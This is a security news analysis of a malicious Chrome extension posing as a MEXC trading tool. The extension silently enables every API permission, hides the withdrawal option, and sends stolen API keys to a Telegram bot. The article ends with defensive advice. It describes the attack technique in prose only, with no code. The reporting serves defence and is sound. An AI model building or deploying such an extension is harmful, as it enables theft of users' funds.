Malicious Chrome Extension Steals Wallet Credentials, Enables Automated Trading Abuse

The rise of browser‑based malware targeting cryptocurrency exchanges reflects attackers’ shift toward harvesting long‑lived API credentials rather than passwords. Unlike one‑time login tokens, API keys often grant unrestricted trading and withdrawal capabilities, making them a high‑value prize for threat actors. By embedding malicious scripts within a seemingly legitimate Chrome extension, cybercriminals can infiltrate an authenticated session without triggering typical security alerts, turning everyday trading tools into covert data‑stealing conduits.

Technical analysis reveals that the MEXC API Automator leverages Manifest V3 permissions to inject code on the exchange’s API‑management page. It programmatically selects all permission checkboxes, then applies CSS tricks and a mutation observer to conceal the withdrawal option from the user’s view. Once the exchange generates the access and secret keys, the extension captures them and forwards the pair via an HTTPS POST to a Telegram bot identified by a hard‑coded token. This exfiltration method bypasses two‑factor authentication, as the attacker only needs the user’s post‑2FA session to complete the theft. The same “SwapSushi” branding across X, YouTube, and malicious domains suggests a coordinated campaign capable of replicating this playbook across other platforms.

For exchanges and traders, the incident underscores the necessity of layered API security. Exchanges should enforce granular permission defaults, require explicit user confirmation for withdrawal rights, and provide real‑time alerts for newly created keys. Users must audit installed extensions, revoke all unused API keys, and employ IP whitelisting or withdrawal limits where possible. As threat actors refine browser‑based credential harvesting, the industry must evolve beyond password hygiene, integrating behavioral analytics and stricter extension vetting to protect billions in digital assets.